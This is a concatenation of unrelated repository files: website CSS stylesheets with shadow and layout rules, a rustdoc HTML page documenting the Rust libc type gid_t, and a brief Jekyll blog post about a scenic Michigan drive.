.shadow_bottom_left_glassySienna7h, .hover_shadow_bottom_left_glassySienna7h:hover, .active_shadow_bottom_left_glassySienna7h:active:hover { -webkit-box-shadow: -0.5em 0.5em 1em rgba(148, 76, 42, .50); -moz-box-shadow: -0.5em 0.5em 1em rgba(148, 76, 42, .50); box-shadow: -0.5em 0.5em 1em rgba(148, 76, 42, .50); } .shadow_bottom_left_glassySienna7a, .hover_shadow_bottom_left_glassySienna7a:hover, .active_shadow_bottom_left_glassySienna7a:active:hover { -webkit-box-shadow: -0.5em 0.5em 1em rgba(134, 68, 38, .63); -moz-box-shadow: -0.5em 0.5em 1em rgba(134, 68, 38, .63); box-shadow: -0.5em 0.5em 1em rgba(134, 68, 38, .63); } .shadow_bottom_left_glassySienna7s, .hover_shadow_bottom_left_glassySienna7s:hover, .active_shadow_bottom_left_glassySienna7s:active:hover { -webkit-box-shadow: -0.5em 0.5em 1em rgba(134, 68, 38, .78); -moz-box-shadow: -0.5em 0.5em 1em rgba(134, 68, 38, .78); box-shadow: -0.5em 0.5em 1em rgba(134, 68, 38, .78); } /* -------------------------- shadow bottom_right settings --------------------------------*/ .shadow_bottom_right_glassySienna7, .hover_shadow_bottom_right_glassySienna7:hover, .active_shadow_bottom_right_glassySienna7:active:hover { -webkit-box-shadow: 0.5em 0.5em 1em rgba(124, 63, 35, .39); -moz-box-shadow: 0.5em 0.5em 1em rgba(124, 63, 35, .39); box-shadow: 0.5em 0.5em 1em rgba(124, 63, 35, .39); } .shadow_bottom_right_glassySienna7h, .hover_shadow_bottom_right_glassySienna7h:hover, .active_shadow_bottom_right_glassySienna7h:active:hover { -webkit-box-shadow: 0.5em 0.5em 1em rgba(148, 76, 42, .50); -moz-box-shadow: 0.5em 0.5em 1em rgba(148, 76, 42, .50); box-shadow: 0.5em 0.5em 1em rgba(148, 76, 42, .50); } .shadow_bottom_right_glassySienna7a, .hover_shadow_bottom_right_glassySienna7a:hover, .active_shadow_bottom_right_glassySienna7a:active:hover { -webkit-box-shadow: 0.5em 0.5em 1em rgba(134, 68, 38, .63); -moz-box-shadow: 0.5em 0.5em 1em rgba(134, 68, 38, .63); box-shadow: 0.5em 0.5em 1em rgba(134, 68, 38, .63); } .shadow_bottom_right_glassySienna7s, .hover_shadow_bottom_right_glassySienna7s:hover, .active_shadow_bottom_right_glassySienna7s:active:hover { -webkit-box-shadow: 0.5em 0.5em 1em rgba(134, 68, 38, .78); -moz-box-shadow: 0.5em 0.5em 1em rgba(134, 68, 38, .78); box-shadow: 0.5em 0.5em 1em rgba(134, 68, 38, .78); }
assets/stylesheets/style.css
glassesleague/glassesleague.github.io
/*************** COLOR VARIABLES ***************/ /*************** CONSISTENT SETTINGS ***************/ /*************** TYPE SETTINGS ***************/ /*************** BUTTON DEFAULTS ***************/ /* line 5, ../sass/modules/_buttons.scss */ .button, .button-secondary, .button-tertiary, .button__outline { background-color: seagreen; display: inline-block; position: relative; font-family: "Open Sans", Helvetica, Arial, sans-serif; text-decoration: none; color: #fff; font-size: 1em; line-height: 1.2em; font-weight: normal; padding: .5em 1.5em; border: 0; border-radius: 4px; cursor: pointer; margin-bottom: .5em; -moz-transition: background-color 0.14s ease-in-out; -o-transition: background-color 0.14s ease-in-out; -webkit-transition: background-color 0.14s ease-in-out; transition: background-color 0.14s ease-in-out; } /* line 23, ../sass/modules/_buttons.scss */ .button:hover, .button-secondary:hover, .button-tertiary:hover, .button__outline:hover, .button:focus, .button-secondary:focus, .button-tertiary:focus, .button__outline:focus { color: #fff; text-decoration: none; background-color: #21653f; } /* line 30, ../sass/modules/_buttons.scss */ .button:active, .button-secondary:active, .button-tertiary:active, .button__outline:active { top: 1px; } /* line 41, ../sass/modules/_buttons.scss */ .button-secondary { background-color: #233E5B; } /* line 45, ../sass/modules/_buttons.scss */ .button-secondary:hover { background-color: #152536; } /* line 50, ../sass/modules/_buttons.scss */ .button-tertiary { background-color: #aaa; } /* line 54, ../sass/modules/_buttons.scss */ .button-tertiary:hover { background-color: #919191; } /* line 62, ../sass/modules/_buttons.scss */ .button__outline { background-color: transparent; border: 3px solid seagreen; color: seagreen; } /* line 68, ../sass/modules/_buttons.scss */ .button__outline:hover { background-color: seagreen; color: #fff; } /*************** FORM STYLING ***************/ /* line 5, ../sass/modules/_forms.scss */ label { display: block; margin-bottom: 5px; } /* line 9, ../sass/modules/_forms.scss */ input[type=text], input[type=email], input[type=phone], input[type=password], input[type=number], input[type=search], textarea { background: #e6e6e6; padding: 5px; outline: none; border: none; height: 44px; width: 300px; margin-bottom: .5rem; } /* line 18, ../sass/modules/_forms.scss */ input[type=text]:focus, input[type=email]:focus, input[type=phone]:focus, input[type=password]:focus, input[type=number]:focus, input[type=search]:focus, textarea:focus { border: 1px solid seagreen; } /* line 22, ../sass/modules/_forms.scss */ input[type=text].full-width, input[type=email].full-width, input[type=phone].full-width, input[type=password].full-width, input[type=number].full-width, input[type=search].full-width, textarea.full-width { width: 100%; } /* line 26, ../sass/modules/_forms.scss */ textarea { height: 132px; } /* line 30, ../sass/modules/_forms.scss */ form { margin-bottom: 40px; } /* line 34, ../sass/modules/_forms.scss */ form .field { margin-bottom: 20px; } /* line 39, ../sass/modules/_forms.scss */ form .note { margin-top: 5px; color: #aaa; } /* line 45, ../sass/modules/_forms.scss */ form .req { font-style: italic; } /* line 53, ../sass/modules/_forms.scss */ form .error .reason { margin-top: 5px; color: #FF4136; } /* line 58, ../sass/modules/_forms.scss */ form .error input[type=text], form .error input[type=email], form .error input[type=phone], form .error input[type=password], form .error input[type=number], form .error input[type=search], form .error textarea { border-color: #FF4136; } /*************** TABLE STYLES ***************/ /* line 5, ../sass/modules/_tables.scss */ table { width: 100%; border: 1px solid #d0d0d0; margin-bottom: 1.5em; } /* line 10, ../sass/modules/_tables.scss */ table caption { margin: 0 0 7px; font-size: 0.75em; color: #aaa; text-transform: uppercase; letter-spacing: 1px; } /* line 19, ../sass/modules/_tables.scss */ tr { border-bottom: 1px solid #d0d0d0; } /* line 22, ../sass/modules/_tables.scss */ tr:nth-child(even) { background-color: #f7f7f7; } /* line 27, ../sass/modules/_tables.scss */ td { padding: 7px; border-right: 1px solid #d0d0d0; } /* line 31, ../sass/modules/_tables.scss */ td:last-child { border-right: 0; } /* line 36, ../sass/modules/_tables.scss */ th { background-color: #f7f7f7; border-bottom: 1px solid #d0d0d0; border-right: 1px solid #d0d0d0; } /* line 41, ../sass/modules/_tables.scss */ th:last-child { border-right: 0; } /*************** Darkly Pygments Theme (c) 2014 Sourcey http://sourcey.com ***************/ /* line 7, ../sass/modules/_syntax.scss */ .highlight { white-space: pre; overflow: auto; word-wrap: normal; /* horizontal scrolling */ -moz-border-radius: 3px; -webkit-border-radius: 3px; border-radius: 3px; padding: 20px; background: #343642; color: #C1C2C3; } /* line 18, ../sass/modules/_syntax.scss */ .highlight .hll { background-color: #ffc; } /* line 19, ../sass/modules/_syntax.scss */ .highlight .gd { color: #2e3436; background-color: #0e1416; } /* line 20, ../sass/modules/_syntax.scss */ .highlight .gr { color: #eeeeec; background-color: #c00; } /* line 21, ../sass/modules/_syntax.scss */ .highlight .gi { color: #babdb6; background-color: #1f2b2d; } /* line 22, ../sass/modules/_syntax.scss */ .highlight .go { color: #2c3032; background-color: #2c3032; } /* line 23, ../sass/modules/_syntax.scss */ .highlight .kt { color: #e3e7df; } /* line 24, ../sass/modules/_syntax.scss */ .highlight .ni { color: #888a85; } /* line 25, ../sass/modules/_syntax.scss */ .highlight .c, .highlight .cm, .highlight .c1, .highlight .cs { color: #8D9684; } /* line 26, ../sass/modules/_syntax.scss */ .highlight .err, .highlight .g, .highlight .l, .highlight .n, .highlight .x, .highlight .p, .highlight .ge, .highlight .gp, .highlight .gs, .highlight .gt, .highlight .ld, .highlight .s, .highlight .nc, .highlight .nd, .highlight .ne, .highlight .nl, .highlight .nn, .highlight .nx, .highlight .py, .highlight .ow, .highlight .w, .highlight .sb, .highlight .sc, .highlight .sd, .highlight .s2, .highlight .se, .highlight .sh, .highlight .si, .highlight .sx, .highlight .sr, .highlight .s1, .highlight .ss, .highlight .bp { color: #C1C2C3; } /* line 31, ../sass/modules/_syntax.scss */ .highlight .k, .highlight .kc, .highlight .kd, .highlight .kn, .highlight .kp, .highlight .kr, .highlight .nt { color: #729fcf; } /* line 33, ../sass/modules/_syntax.scss */ .highlight .cp, .highlight .gh, .highlight .gu, .highlight .na, .highlight .nf { color: #E9A94B; } /* line 34, ../sass/modules/_syntax.scss */ .highlight .m, .highlight .nb, .highlight .no, .highlight .mf, .highlight .mh, .highlight .mi, .highlight .mo, .highlight .il { color: #8ae234; } /* line 36, ../sass/modules/_syntax.scss */ .highlight .o { color: #989DAA; } /* line 37, ../sass/modules/_syntax.scss */ .highlight .nv, .highlight .vc, .highlight .vg, .highlight .vi { color: #fff; } /*************** A MORE MODERN SCALE http://typecast.com/blog/a-more-modern-scale-for-web-typography ***************/ /* line 6, ../sass/partials/_typography.scss */ body { font-size: 1em; /* equivalent to 16px */ line-height: 1.45; /* equivalent to 20px */ } /* line 12, ../sass/partials/_typography.scss */ body .intro { font-size: 1.25em; line-height: 1.7; } @media (min-width: 43.75em) { /* line 19, ../sass/partials/_typography.scss */ body { font-size: 1em; /* equivalent to 16px */ line-height: 1.375; /* equivalent to 22px */ } } /* line 27, ../sass/partials/_typography.scss */ h1, .h1, h2, .h2, h3, .h3, h4, .h4, h5, .h5, h6, .h6 { margin: .5rem 0 1.5rem; font-family: "Open Sans", Helvetica, Arial, sans-serif; } /* line 33, ../sass/partials/_typography.scss */ h1, .h1 { font-size: 2em; line-height: 1.25; } @media (min-width: 43.75em) { /* line 39, ../sass/partials/_typography.scss */ h1, .h1 { font-size: 2.5em; line-height: 1.125; } } @media (min-width: 56.25em) { /* line 46, ../sass/partials/_typography.scss */ h1, .h1 { font-size: 3em; line-height: 1.05; } } /* line 52, ../sass/partials/_typography.scss */ h2, .h2 { font-size: 1.625em; line-height: 1.15384615; } @media (min-width: 43.75em) { /* line 58, ../sass/partials/_typography.scss */ h2, .h2 { font-size: 2em; line-height: 1.25; } } @media (min-width: 56.25em) { /* line 65, ../sass/partials/_typography.scss */ h2, .h2 { font-size: 2.25em; line-height: 1.25; } } /* line 71, ../sass/partials/_typography.scss */ h3, .h3 { font-size: 1.375em; line-height: 1.13636364; } @media (min-width: 43.75em) { /* line 77, ../sass/partials/_typography.scss */ h3, .h3 { font-size: 1.5em; line-height: 1.25; } } @media (min-width: 56.25em) { /* line 84, ../sass/partials/_typography.scss */ h3, .h3 { font-size: 1.75em; line-height: 1.25; } } /* line 90, ../sass/partials/_typography.scss */ h4, .h4 { font-size: 1.125em; line-height: 1.11111111; } @media (min-width: 43.75em) { /* line 96, ../sass/partials/_typography.scss */ h4, .h4 { line-height: 1.22222222; } } /* line 101, ../sass/partials/_typography.scss */ blockquote { font-size: 1.25em; line-height: 1.25; padding: 0; } @media (min-width: 43.75em) { /* line 108, ../sass/partials/_typography.scss */ blockquote { font-size: 1.5em; line-height: 1.45833333; } } /*************** TRANSITION ***************/ /* @include transition(all 0.2s ease-in-out); */ /*************** BOX SIZING ***************/ /* @include box-sizing(border-box); */ /*************** CLEAR AFTER FLOATS ***************/ /* line 45, ../sass/partials/_mixins.scss */ .clearfix { zoom: 1; } /* line 34, ../sass/partials/_mixins.scss */ .clearfix:before, .clearfix:after { content: "\0020"; display: block; height: 0; overflow: hidden; } /* line 40, ../sass/partials/_mixins.scss */ .clearfix:after { clear: both; } /*************** SUSY GRID CONFIGURATION ***************/ /*************** GLOBAL STYLES ***************/ /* line 6, ../sass/breakpoints/_mobileup.scss */ html { box-sizing: border-box; } /* line 9, ../sass/breakpoints/_mobileup.scss */ *, *:before, *:after { box-sizing: inherit; } /* line 13, ../sass/breakpoints/_mobileup.scss */ body { font-family: "PT Serif", Georgia, Times, serif; line-height: 1.75; font-size: 112.5%; color: #111; overflow-x: hidden; } /* line 20, ../sass/breakpoints/_mobileup.scss */ body p, body ul { margin: 0 0 2rem; } /* line 26, ../sass/breakpoints/_mobileup.scss */ ::-moz-selection { background: seagreen; color: white; } /* line 31, ../sass/breakpoints/_mobileup.scss */ ::selection { background: seagreen; color: white; } /* line 37, ../sass/breakpoints/_mobileup.scss */ img, video, audio, iframe, object { max-width: 100%; } /* line 42, ../sass/breakpoints/_mobileup.scss */ .container { max-width: 610px; margin-left: auto; margin-right: auto; padding: 0 20px; } /* line 12, ../../../../../.rvm/gems/ruby-2.3.1/gems/susy-2.2.12/sass/susy/output/support/_clearfix.scss */ .container:after { content: " "; display: block; clear: both; } /*************** LINK STYLING ***************/ /* line 52, ../sass/breakpoints/_mobileup.scss */ a { color: seagreen; } /* line 55, ../sass/breakpoints/_mobileup.scss */ a:hover { color: #1b5233; } /*************** MENU STYLING ***************/ /* line 65, ../sass/breakpoints/_mobileup.scss */ .nav-collapse { z-index: 1; } /* line 68, ../sass/breakpoints/_mobileup.scss */ .nav-collapse ul { margin: 0; padding: 0; width: 100%; display: block; list-style: none; } /* line 75, ../sass/breakpoints/_mobileup.scss */ .nav-collapse ul li { width: 100%; display: block; background: seagreen; border-bottom: 2px solid #349e63; } /* line 81, ../sass/breakpoints/_mobileup.scss */ .nav-collapse ul li a { color: white; text-decoration: none; display: block; padding: 5px 2rem; } /* line 91, ../sass/breakpoints/_mobileup.scss */ .js .nav-collapse { clip: rect(0 0 0 0); max-height: 0; position: absolute; display: block; overflow: hidden; zoom: 1; clear: both; width: 100%; } /* line 102, ../sass/breakpoints/_mobileup.scss */ .nav-collapse.opened { max-height: 9999px; } /* line 106, ../sass/breakpoints/_mobileup.scss */ .nav-toggle { -webkit-tap-highlight-color: transparent; -webkit-touch-callout: none; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; -o-user-select: none; user-select: none; float: right; line-height: 2em; margin-top: .5em; background-color: seagreen; border-radius: 4px; padding: 0 .5em; color: white; text-decoration: none; position: relative; right: 2rem; -webkit-transition: all 0.2s ease-in-out; transition: all 0.2s ease-in-out; } /* line 126, ../sass/breakpoints/_mobileup.scss */ .nav-toggle:hover { color: white; background-color: #21653f; } /*************** LIST STYLING ***************/ /* line 137, ../sass/breakpoints/_mobileup.scss */ .noList { list-style: none; padding-left: 0; margin-left: 0; } /* line 143, ../sass/breakpoints/_mobileup.scss */ dt { font-weight: bold; } /* line 147, ../sass/breakpoints/_mobileup.scss */ dd { margin: 0 0 1.5rem; } /* line 151, ../sass/breakpoints/_mobileup.scss */ .post ul ul, .post ul ol, .post ol ul, .post ol ol { margin: 0; } /*************** PAGE STYLES ***************/ /* line 163, ../sass/breakpoints/_mobileup.scss */ .pageTitle { margin: 2rem auto 1em; text-align: center; } /* line 168, ../sass/breakpoints/_mobileup.scss */ .content { padding-top: 1em; } /*************** HEADER STYLING ***************/ /* line 177, ../sass/breakpoints/_mobileup.scss */ .header { background-color: seagreen; background-image: url("../img/jinja.jpg"); background-size: cover; background-position: center center; color: white; padding: 0; height: 3em; } /* line 186, ../sass/breakpoints/_mobileup.scss */ .header .container { padding: 0; max-width: 100%; margin-left: auto; margin-right: auto; } /* line 12, ../../../../../.rvm/gems/ruby-2.3.1/gems/susy-2.2.12/sass/susy/output/support/_clearfix.scss */ .header .container:after { content: " "; display: block; clear: both; } /* line 191, ../sass/breakpoints/_mobileup.scss */ .header h1 { margin: 0; float: left; padding-left: 2rem; font-size: 1em; line-height: 3em; font-family: "Open Sans", Helvetica, Arial, sans-serif; font-weight: 800; text-transform: uppercase; } /* line 201, ../sass/breakpoints/_mobileup.scss */ .header h1 a { color: white; text-decoration: none; } /*************** POST STYLING ***************/ /* line 215, ../sass/breakpoints/_mobileup.scss */ .post .postTitle { text-align: center; margin-top: 2rem; margin-bottom: 1rem; } /* line 221, ../sass/breakpoints/_mobileup.scss */ .post blockquote { clear: both; margin: 2.5em 0; padding: 0; line-height: 1.8; position: relative; } /* line 228, ../sass/breakpoints/_mobileup.scss */ .post blockquote:before { content: ""; position: absolute; top: -1.25em; background: seagreen; display: block; height: 2px; width: 150px; left: calc(50% - 75px); } /* line 239, ../sass/breakpoints/_mobileup.scss */ .post blockquote:after { content: ""; position: absolute; bottom: -1.25em; background: seagreen; display: block; height: 2px; width: 150px; left: calc(50% - 75px); } /* line 251, ../sass/breakpoints/_mobileup.scss */ .post .meta { text-align: center; color: gray; font-family: "Open Sans", Helvetica, Arial, sans-serif; font-weight: 300; } /* line 258, ../sass/breakpoints/_mobileup.scss */ .post figure { margin: 3rem 0; } /* line 261, ../sass/breakpoints/_mobileup.scss */ .post figure figcaption { text-align: center; font-size: .9em; font-style: italic; color: #5e5e5e; } /* line 268, ../sass/breakpoints/_mobileup.scss */ .post figure img { margin: 0 auto; display: block; } /* line 274, ../sass/breakpoints/_mobileup.scss */ .post img { margin-bottom: 2rem; } /* line 278, ../sass/breakpoints/_mobileup.scss */ .post .highlight { clear: both; margin-bottom: 2rem; } /* line 283, ../sass/breakpoints/_mobileup.scss */ .post .dropcap { color: seagreen; margin-right: .45rem; } /* line 288, ../sass/breakpoints/_mobileup.scss */ .post .featuredImage { position: relative; margin-top: 2rem; } /* line 292, ../sass/breakpoints/_mobileup.scss */ .post .featuredImage img { margin-bottom: 0; } /*************** POST NAV STYLING ***************/ /* line 303, ../sass/breakpoints/_mobileup.scss */ .postNav { border-top: 1px solid #e6e6e6; border-bottom: 1px solid #e6e6e6; overflow: hidden; } /* line 308, ../sass/breakpoints/_mobileup.scss */ .postNav .prev, .postNav .next { display: block; width: 100%; height: 5rem; overflow: hidden; position: relative; font-family: "Open Sans", Helvetica, Arial, sans-serif; font-weight: 800; font-size: .9em; text-transform: uppercase; text-align: center; } /* line 320, ../sass/breakpoints/_mobileup.scss */ .postNav .prev img, .postNav .next img { z-index: 1; display: block; position: absolute; top: 50%; -webkit-transform: translateY(-50%); -ms-transform: translateY(-50%); transform: translateY(-50%); left: 0; width: 100%; height: auto; } /* line 333, ../sass/breakpoints/_mobileup.scss */ .postNav .prev span, .postNav .next span { z-index: 10; position: relative; padding: .5rem; position: absolute; top: 50%; -webkit-transform: translateY(-50%); -ms-transform: translateY(-50%); transform: translateY(-50%); width: 100%; line-height: 1.4; } /* line 346, ../sass/breakpoints/_mobileup.scss */ .postNav .prev.image, .postNav .next.image { text-decoration: none; color: white; text-shadow: 1px 1px 3px rgba(0, 0, 0, 0.8); padding: 0 .5rem; position: relative; -webkit-transition: all 0.2s ease-in-out; transition: all 0.2s ease-in-out; } /* line 356, ../sass/breakpoints/_mobileup.scss */ .postNav .prev:hover.image, .postNav .next:hover.image { opacity: .8; } /* line 363, ../sass/breakpoints/_mobileup.scss */ .postNav .prev span { left: 0; } /* line 369, ../sass/breakpoints/_mobileup.scss */ .postNav .next span { right: 0; } /*************** FOOTER STYLING ***************/ /* line 380, ../sass/breakpoints/_mobileup.scss */ .footer { text-align: center; padding: 2rem 0; } /* line 384, ../sass/breakpoints/_mobileup.scss */ .footer .container { border-top: 4px solid #d9d9d9; padding-top: .5em; max-width: 90%; margin-left: auto; margin-right: auto; } /* line 12, ../../../../../.rvm/gems/ruby-2.3.1/gems/susy-2.2.12/sass/susy/output/support/_clearfix.scss */ .footer .container:after { content: " "; display: block; clear: both; } /* line 390, ../sass/breakpoints/_mobileup.scss */ .footer .copy, .footer .footer-links { font-size: .8em; } /* line 394, ../sass/breakpoints/_mobileup.scss */ .footer .copy { margin-bottom: 1rem; } /* line 399, ../sass/breakpoints/_mobileup.scss */ .footer-links ul { text-align: center; } /* line 402, ../sass/breakpoints/_mobileup.scss */ .footer-links ul li { display: inline-block; } /* line 405, ../sass/breakpoints/_mobileup.scss */ .footer-links ul li a { display: inline-block; width: 30px; height: 30px; -webkit-transition: all 0.2s ease-in-out; transition: all 0.2s ease-in-out; } /* line 411, ../sass/breakpoints/_mobileup.scss */ .footer-links ul li a svg { display: block; width: 100%; height: 100%; } /* line 416, ../sass/breakpoints/_mobileup.scss */ .footer-links ul li a svg .outer-shape { fill: seagreen; } /* line 420, ../sass/breakpoints/_mobileup.scss */ .footer-links ul li a svg .inner-shape { fill: white; } /* line 430, ../sass/breakpoints/_mobileup.scss */ .footer-links ul li:hover a svg .outer-shape { fill: #21653f; } /*************** PAGINATION STYLING ***************/ /* line 447, ../sass/breakpoints/_mobileup.scss */ .pagination .next { float: left; } /* line 451, ../sass/breakpoints/_mobileup.scss */ .pagination .previous { float: right; } /*************** POST LIST STYLING ***************/ /* line 462, ../sass/breakpoints/_mobileup.scss */ .posts li { margin-bottom: 4rem; position: relative; } /* line 466, ../sass/breakpoints/_mobileup.scss */ .posts li:before { content: ""; position: absolute; bottom: -2rem; left: 0; background: #e6e6e6; height: 2px; width: 60px; } /* line 476, ../sass/breakpoints/_mobileup.scss */ .posts li a { text-decoration: none; } /* line 479, ../sass/breakpoints/_mobileup.scss */ .posts li a:hover { text-decoration: underline; } /* line 484, ../sass/breakpoints/_mobileup.scss */ .posts li .date { color: gray; font-family: "Open Sans", Helvetica, Arial, sans-serif; font-weight: 300; font-size: .8em; } /* line 491, ../sass/breakpoints/_mobileup.scss */ .posts li h3 { margin: 0 0 .5em; } @media only screen and (min-width: 800px) { /*************** GLOBAL STYLES ***************/ /* line 5, ../sass/breakpoints/_800up.scss */ .content { padding-top: 0; position: relative; z-index: 1; } /* line 10, ../sass/breakpoints/_800up.scss */ .content:after { z-index: -1; background: white; content: ""; display: block; width: 100%; height: 5em; position: absolute; top: -2em; left: 0; -webkit-transform: skewY(-2deg); -ms-transform: skewY(-2deg); transform: skewY(-2deg); -webkit-transform-origin: bottom left; -ms-transform-origin: bottom left; transform-origin: bottom left; } /* line 29, ../sass/breakpoints/_800up.scss */ .container { max-width: 800px; margin-left: auto; margin-right: auto; padding: 0; } /* line 12, ../../../../../.rvm/gems/ruby-2.3.1/gems/susy-2.2.12/sass/susy/output/support/_clearfix.scss */ .container:after { content: " "; display: block; clear: both; } /*************** HOMEPAGE STYLING ***************/ /* line 40, ../sass/breakpoints/_800up.scss */ #home .posts, #home .pageTitle, #home .pagination { width: 74.46809%; float: left; margin-right: 2.12766%; float: none; margin: 0 auto 1.5em; } /* line 46, ../sass/breakpoints/_800up.scss */ #home .pageTitle { margin: 2rem auto 1em; } /*************** HEADER STYLING ***************/ /* line 56, ../sass/breakpoints/_800up.scss */ .header { height: 15em; position: relative; padding-bottom: 2em; } /* line 61, ../sass/breakpoints/_800up.scss */ .header .container { position: relative; top: 50%; -webkit-transform: translateY(-50%); -ms-transform: translateY(-50%); transform: translateY(-50%); max-width: 800px; margin-left: auto; margin-right: auto; } /* line 12, ../../../../../.rvm/gems/ruby-2.3.1/gems/susy-2.2.12/sass/susy/output/support/_clearfix.scss */ .header .container:after { content: " "; display: block; clear: both; } /* line 70, ../sass/breakpoints/_800up.scss */ .header h1 { font-size: 3em; line-height: 1; letter-spacing: -3px; padding-left: 0; } /* line 77, ../sass/breakpoints/_800up.scss */ .header nav { float: left; clear: left; } /* line 81, ../sass/breakpoints/_800up.scss */ .header nav ul { margin: 0; } /* line 83, ../sass/breakpoints/_800up.scss */ .header nav ul li { display: inline; line-height: 3em; background: none; padding: 0 5px; border: none; } /* line 90, ../sass/breakpoints/_800up.scss */ .header nav ul li a { color: white; font-size: .9em; text-decoration: none; padding: 0 .25em; } /* line 96, ../sass/breakpoints/_800up.scss */ .header nav ul li a:hover { color: #cccccc; } /* line 101, ../sass/breakpoints/_800up.scss */ .header nav ul li.current { padding-bottom: .25em; border-bottom: 4px solid rgba(255, 255, 255, 0.4); } /*************** MENU STYLING ***************/ /* line 117, ../sass/breakpoints/_800up.scss */ .js .nav-collapse { position: relative; max-height: none; } /* line 121, ../sass/breakpoints/_800up.scss */ .js .nav-collapse.closed { max-height: none; } /* line 125, ../sass/breakpoints/_800up.scss */ .js .nav-collapse ul li a { display: inline-block; } /* line 131, ../sass/breakpoints/_800up.scss */ .nav-toggle { display: none; } /*************** POST STYLING ***************/ /* line 141, ../sass/breakpoints/_800up.scss */ .post h1, .post h2, .post h3, .post h4, .post h5, .post h6, .post p, .post ul, .post ol, .post dl, .post .pageTitle { width: 74.46809%; float: left; margin-right: 2.12766%; float: none; margin: 0 auto 2rem; } /* line 147, ../sass/breakpoints/_800up.scss */ .post h1, .post .h1, .post h2, .post .h2, .post h3, .post .h3, .post h4, .post .h4, .post h5, .post .h5, .post h6, .post .h6 { margin: 1rem auto; } /* line 151, ../sass/breakpoints/_800up.scss */ .post .pageTitle { margin: 2rem auto 1em; } /* line 155, ../sass/breakpoints/_800up.scss */ .post .featuredImage { position: relative; margin-top: 2rem; } /* line 159, ../sass/breakpoints/_800up.scss */ .post .featuredImage:before { background: white; content: ""; display: block; width: 100%; height: 4em; position: absolute; top: -2em; left: 0; -webkit-transform: skewY(-2deg); -ms-transform: skewY(-2deg); transform: skewY(-2deg); -webkit-transform-origin: bottom left; -ms-transform-origin: bottom left; transform-origin: bottom left; } /*************** POST NAV STYLING ***************/ /* line 185, ../sass/breakpoints/_800up.scss */ .postNav .prev, .postNav .next { width: 50%; } /* line 189, ../sass/breakpoints/_800up.scss */ .postNav .prev { float: left; text-align: left; } /* line 194, ../sass/breakpoints/_800up.scss */ .postNav .next { text-align: right; float: right; } /*************** FOOTER STYLES ***************/ /* line 206, ../sass/breakpoints/_800up.scss */ .footer-links { float: right; } /* line 210, ../sass/breakpoints/_800up.scss */ .footer .copy { float: left; } /* line 214, ../sass/breakpoints/_800up.scss */ .footer .container { padding: 1rem 0; max-width: 800px; margin-left: auto; margin-right: auto; } /* line 12, ../../../../../.rvm/gems/ruby-2.3.1/gems/susy-2.2.12/sass/susy/output/support/_clearfix.scss */ .footer .container:after { content: " "; display: block; clear: both; } /*************** CONTACT PAGE STYLING ***************/ /* line 225, ../sass/breakpoints/_800up.scss */ .contactContent { width: 48.93617%; float: left; margin-right: 2.12766%; } /* line 230, ../sass/breakpoints/_800up.scss */ #contact form { width: 48.93617%; float: right; margin-right: 0; } }
docs/libc/type.gid_t.html
rxse/rust-markov-text
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="generator" content="rustdoc"> <meta name="description" content="API documentation for the Rust `gid_t` type in crate `libc`."> <meta name="keywords" content="rust, rustlang, rust-lang, gid_t"> <title>libc::gid_t - Rust</title> <link rel="stylesheet" type="text/css" href="../rustdoc.css"> <link rel="stylesheet" type="text/css" href="../main.css"> <link rel="shortcut icon" href="https://doc.rust-lang.org/favicon.ico"> </head> <body class="rustdoc"> <!--[if lte IE 8]> <div class="warning"> This old browser is unsupported and will most likely display funky things. </div> <![endif]--> <nav class="sidebar"> <a href='../libc/index.html'><img src='https://www.rust-lang.org/logos/rust-logo-128x128-blk-v2.png' alt='logo' width='100'></a> <p class='location'><a href='index.html'>libc</a></p><script>window.sidebarCurrent = {name: 'gid_t', ty: 'type', relpath: ''};</script><script defer src="sidebar-items.js"></script> </nav> <nav class="sub"> <form class="search-form js-only"> <div class="search-container"> <input class="search-input" name="search" autocomplete="off" placeholder="Click or press ‘S’ to search, ‘?’ for more options…" type="search"> </div> </form> </nav> <section id='main' class="content type"> <h1 class='fqn'><span class='in-band'><a href='index.html'>libc</a>::<wbr><a class='type' href=''>gid_t</a></span><span class='out-of-band'><span id='render-detail'> <a id="toggle-all-docs" href="javascript:void(0)" title="collapse all docs"> [<span class='inner'>&#x2212;</span>] </a> </span><a id='src-270' class='srclink' href='../src/libc/unix/mod.rs.html#10' title='goto source code'>[src]</a></span></h1> <pre class='rust typedef'>type gid_t = <a class='primitive' href='https://doc.rust-lang.org/nightly/std/primitive.u32.html'>u32</a>;</pre></section> <section id='search' class="content hidden"></section> <section class="footer"></section> <aside id="help" class="hidden"> <div> <h1 class="hidden">Help</h1> <div class="shortcuts"> <h2>Keyboard Shortcuts</h2> <dl> <dt>?</dt> <dd>Show this help dialog</dd> <dt>S</dt> <dd>Focus the search field</dd> <dt>&larrb;</dt> <dd>Move up in search results</dd> <dt>&rarrb;</dt> <dd>Move down in search results</dd> <dt>&#9166;</dt> <dd>Go to active search result</dd> <dt>+</dt> <dd>Collapse/expand all sections</dd> </dl> </div> <div class="infos"> <h2>Search Tricks</h2> <p> Prefix searches with a type followed by a colon (e.g. <code>fn:</code>) to restrict the search to a given type. </p> <p> Accepted types are: <code>fn</code>, <code>mod</code>, <code>struct</code>, <code>enum</code>, <code>trait</code>, <code>type</code>, <code>macro</code>, and <code>const</code>. </p> <p> Search functions by type signature (e.g. <code>vec -> usize</code> or <code>* -> vec</code>) </p> </div> </div> </aside> <script> window.rootPath = "../"; window.currentCrate = "libc"; window.playgroundUrl = ""; </script> <script src="../jquery.js"></script> <script src="../main.js"></script> <script defer src="../search-index.js"></script> </body> </html>
_posts/2009-08-30-i-wasnt-joking.html
daveande/daveande.github.io
--- layout: post title: I wasn't joking date: '2009-08-30T18:52:00.005-04:00' author: DA tags: - Pure Michigan - Michigan modified_time: '2009-08-30T19:00:31.678-04:00' blogger_id: tag:blogger.com,1999:blog-17447662.post-2891623103202820583 blogger_orig_url: http://daveande.blogspot.com/2009/08/i-wasnt-joking.html --- National Georgraphic Traveler named <a href="http://traveler.nationalgeographic.com/drives/lake-superior.html">the U.P. drive</a> one of the world's greatest scenic routes.<br /><br>
themes/pacify-child/style.css
misterbigood/doc-saemf
